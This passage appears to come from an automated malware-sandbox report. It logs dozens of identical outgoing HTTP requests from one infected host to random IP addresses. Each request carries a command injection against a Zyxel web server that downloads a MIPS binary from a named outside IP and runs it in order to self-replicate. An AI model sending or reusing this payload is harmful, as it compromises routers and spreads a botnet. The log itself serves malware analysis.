                                      Jan 14, 2024 15:50:37.067292929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1830192.168.2.1448346119.254.128.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067321062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1831192.168.2.14444829.200.0.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067395926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1832192.168.2.1436290148.47.201.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067420006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1833192.168.2.144550446.218.42.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067452908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1834192.168.2.1455998168.183.64.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067487955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1835192.168.2.1451792210.234.183.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067543983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1836192.168.2.1443834167.76.5.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067580938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1837192.168.2.1453124213.233.208.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067620993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1838192.168.2.1454412191.28.105.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067652941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1839192.168.2.144305264.78.129.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067686081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1840192.168.2.1456500148.29.238.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067712069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1841192.168.2.1456534157.230.215.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067738056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1842192.168.2.1435574195.227.13.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067800999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1843192.168.2.145905092.194.34.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067843914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1844192.168.2.144600484.47.23.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067883968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1845192.168.2.1449392172.135.59.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067912102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1846192.168.2.144572246.124.159.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067948103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1847192.168.2.143635891.252.176.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.067986012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1848192.168.2.1443126143.228.123.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068006992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1849192.168.2.1454128173.101.153.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068041086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1850192.168.2.1448438114.64.25.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068093061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1851192.168.2.1443936134.200.121.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068140030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1852192.168.2.144847484.133.150.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068149090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1853192.168.2.1458454105.40.180.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068197012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1854192.168.2.1454376171.193.226.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068227053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1855192.168.2.1449144192.84.118.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068267107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1856192.168.2.14412184.232.106.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068315029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1857192.168.2.1446080178.252.241.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068351030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1858192.168.2.1435246198.238.195.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068399906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1859192.168.2.1452968111.45.115.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068459988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1860192.168.2.1453354119.107.109.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068507910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1861192.168.2.1447270150.253.205.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068545103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1862192.168.2.145351658.54.25.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068566084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1863192.168.2.1443812183.146.17.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068617105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1864192.168.2.145291247.43.236.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068658113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1865192.168.2.1458676175.36.13.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068691969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1866192.168.2.1444714206.77.92.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068747997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1867192.168.2.143814272.78.167.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068787098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1868192.168.2.145716847.33.97.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068845034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1869192.168.2.1432838188.170.30.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068871021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1870192.168.2.1433876159.152.245.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068907022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1871192.168.2.1457422122.114.188.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068963051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1872192.168.2.1456940169.235.212.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.068990946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1873192.168.2.1454802210.169.224.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069022894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1874192.168.2.145051052.156.113.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069070101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1875192.168.2.1444494150.19.100.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069132090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1876192.168.2.1433654195.63.87.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069168091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1877192.168.2.1460100151.103.143.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069199085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1878192.168.2.1449332167.114.181.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069247961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1879192.168.2.1454256126.118.130.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069293022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1880192.168.2.144029836.198.216.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069338083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1881192.168.2.14594348.31.109.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069386959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1882192.168.2.1459876159.214.83.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069415092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1883192.168.2.1451668128.130.131.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069457054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1884192.168.2.1447978206.230.90.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069514990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1885192.168.2.145792436.248.218.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069576979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1886192.168.2.145640881.55.100.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069610119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1887192.168.2.1439054182.82.157.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069638968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1888192.168.2.1446616222.173.31.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069698095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1889192.168.2.145044850.160.242.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069756031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1890192.168.2.1457052186.70.56.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069785118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1891192.168.2.145020853.7.119.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069849968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1892192.168.2.144476214.121.85.142443
                                      TimestampBytes transferredDirectionData
